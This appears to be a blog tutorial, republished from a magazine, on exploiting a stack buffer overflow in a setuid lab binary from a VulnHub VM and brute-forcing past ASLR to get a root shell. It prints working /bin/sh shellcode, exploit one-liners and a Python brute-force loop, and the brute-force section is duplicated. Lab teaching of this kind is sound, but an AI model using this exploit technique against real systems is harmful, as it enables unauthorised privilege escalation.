1. Introduction
Hi ALL, Today i will talk about my article published in Hakin9 magazine “bypassing ASLR Protection using Bruteforce”
Most of us are familiar with basic stack and heap buffer overflow attacks and how they can be exploited, in most modern computers multiple protections are applied to prevent buffer overflow attacks including Canary Values, ASLR. DEP,…etc. In this article we will look in to one type of BOF protections which is ASLR and how it can be defeated using a simple Brute force.
ASLR is an abbreviation for Address Space Layout Randomization, It’s a memory-protection process for operating system that guards against buffer-overflow attacks by randomizing the location where system executable are loaded into memory.
I don’t intend to talk about the math involved in ASLR, But quickly Effectiveness of ASLR is limited by the amount of entropy assigned (Number of random Bits that the stack and heap can be offset by) so the obviously the amount of randomization will differs from 32 to 64 bit systems that’s why 64 bit systems are harder to exploit when ASLR is enabled.
1. Basic Stack BOF Exploit
First, for those who are wondering what is buffer overflow I would like to give a quick overview about BOF Attacks and how they are done.
A buffer is a temporary area for data storage. when data transferred to a buffer exceeds the storage capacity of that buffer, this will cause the data to overflow and override existing buffers and registers, A malicious hacker can exploit this by overriding the EIP Pointer to point to a shell code injected using the BOF vulnerability and cause it to be executed.
The Idea of the BOF is to inject our shell code and override the EIP(Instruction pointer) with the address to the shell code hence it will get executed. Below is a figure showing the operation, where the RET is the EIP Register
In the next sections we will use a sample vulnerable ELF file I got from “The Lord Of The Root” VM on https://www.VulnHub.com
We will exploit the binary two times, first time without ASLR protection enabled and the second time when enabling the Protection
1. BOF Exploit (No ASLR)
Below is just an binary with setuid permission that takes the user input argv[1] and store it in to a buffer, the goal is to exploit this binary to do a privilege escalation and get a root shell on the box.
First let’s fire up our Linux Mint and check if ASLR is enabled or not by running the command
cat /proc/sys/kernel/randomize_va_space
if the output if 0 it means it’s disabled if the output is 1 or 2 it means it’s enabled, as per below screenshot it’s disabled.
Our ELF file is called VulnerableAPP, let’s check if it’s vulnerable to BOF or not, we run the executable with an input of 1Kb using the following command. /VulnerableApp $(python –c ‘print “A”*1000’)
We got a segmentation fault which means that the EIP register is overridden and it’s pointing in a location on the memory that can’t be executed
The most important step for Exploiting BOF vulnerabilities is to get EIP offset, one of the techniques used is the pattern_create and pattern_offset tool from Metasploit team, pattern_create generate a payload that you use in a BOF vulnerability and then using GDB you can get the address of the EIP and use it as an input for pattern_offset and it will give you the offset of the EIP Register, let’s see it in action.
Let’s generate a payload of 1kB using the following command
/usr/share/metasploit-framework/tools/pattern_create.rb 1000
Run the ELF file using GDB Debugger to get the address of the EIP. Give the generated payload as an input to the Vulnerable binary
As seen the program exits when the EIP points to this memory address 0x41376641, if we give this address as an input for the pattern_offset tool it will give us the exact offset for the EIP pointer which is 171
To make sure let’s put the payload as this A*171 + B*4, the expected output is that the ASCI of B will override the EIP register which is 42.
(gdb) run $(python -c 'print "A"*171 + "B"*4')
Next step is to get the Address of the EIP to override the EIP register, as a simple way to do that is to examine the Stack using the x command in gdb x/1000x $esp
11
As we can see the value 0x42424242 lies at the below address 0xbffff7f0, one thing we can do is to make this address point to our shellcode and voila we can get a shell with root access on the box.
Our payload will be as follow “A”*171 + <RET Address> + <NOP Sleds> + <ShellCode>
Where the return address will point to our /bin/sh shellcode.
‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80’
Below is the exploit command
./VulnerableApp $(python -c 'print "A"*171 + "\xf0\xf7\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
Below before running our exploit the output of whoami was smeagol, after running our exploit it was root, great isn’t it!
1. ASLR Effect
First before exploiting the binary with ASLR Protection let’s check and understand what is the effect of ASLR on executing a program.
Below is a simple C code for a program that print the top of the stack(ESP).
#include <stdlib.h>
int main (int argc, char *argv[]) {
char *addr;
printf("%p\n",&addr);
return 0;
}
Let’s run it couple of times without the ASLR protection. As in the screenshot the address is always the same 0xbffff62c
Let’s try to run it again after enabling ASLR, to enable ASLR protection we can use this command
echo 2 >/proc/sys/kernel/randomize_va_space
To verify that let’s run a cat on the file
Let’s run the ESP program now and check the output.
Let’s run our exploit Command again after enabling the ASLR protection and check if it will get us a root access or not!
./VulnerableApp $(python -c 'print "A"*171 + "\xf0\xf7\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
As expected it didn’t work!
1. BOF Exploit (with ASLR Protection)
ASLR has many sophisticated ways that can bypass, it due to vulnerabilities in its implementation, the most simple and my favorite way is brute force. In this technique attacker chooses a particular libc base address and continues to attack the program until he succeeds. This technique is the simplest of the technique to bypass ASLR, provided you get lucky!
First let’s get a random address by running our print ESP program (0xbfeee61c)
Now we will use this address in our exploit code and hope when brute forcing it will point to our shellcode, The Question is how to increase our chances?!
The answer is NOP Sleds.
A NOP (No operation) is an instruction that does nothing but increment the instruction pointer. This means that if you are able to place a number of NOPs before your shell code, you just need to jump to any of these NOP-instructions and they will slide the instruction pointer down to your shell code. 0x90 is the opcode of a NOP-instruction on Intel x86
Let’s start writing our exploit code.
import os
i=1 ##Counter for Counting number of trials
while True: ##Continue running the program till it succeeds
eipOffset = 171 ##EIP offset
RandomAddress = '\x1c\xe6\xee\xbf’ ##Address we got from we run ESP program 0xbfeee61c
nopSleds = 20480 ##Large number of NOP sleds
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80' ## Our /bin/sh shellcode
exploit = ('A' * eipOffset) + RandomAddress + ('\x90' * nopSleds) + shellcode ##our exploit payload
print "BruteForce ASLR Trial Number " + str(i) ##printing number of trial
os.system("/home/smeagol/VulnerableApp" + ' ' + exploit) ##executing the program
i=i+1 ##incrementing number of trial upon failed attempt
lets run our code and see if it will succeeds, and after how many trials?.
Gr8 It worked after 292 trials, Glad it succeeded before the release date of the magazine!
Let’s start writing our exploit code.
import os
i=1 ##Counter for Counting number of trials
while True: ##Continue running the program till it succeeds
eipOffset = 171 ##EIP offset
RandomAddress = '\x1c\xe6\xee\xbf’ ##Address we got from we run ESP program 0xbfeee61c
nopSleds = 20480 ##Large number of NOP sleds
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80' ## Our /bin/sh shellcode
exploit = ('A' * eipOffset) + RandomAddress + ('\x90' * nopSleds) + shellcode ##our exploit payload
print "BruteForce ASLR Trial Number " + str(i) ##printing number of trial
os.system("/home/smeagol/VulnerableApp" + ' ' + exploit) ##executing the program
i=i+1 ##incrementing number of trial upon failed attempt
lets run our code and see if it will succeeds, and after how many trials?.
Gr8 It worked after 292 trials, Glad it succeeded before the release date of the magazine!
1. Conclusion
Beating ASLR Protection is pretty easy, all you need is a cup of coffee, Some free time and obviously some luck.
To have access to the vulnerable binary, Exploit Source codes please refer to my github project, Thanks for your Hope you enjoyed.
https://github.com/HacKeD0x90/ASLRBruteForceTutorial
Thanks Hope You Enjoyed.
Thank for your good article.
How can i found VulnerableApp that you used in this process??
Please guide me to find the VulnerableApp.
Hello,
You can find it here
https://github.com/HacKeD0x90/ASLRBruteForceTutorial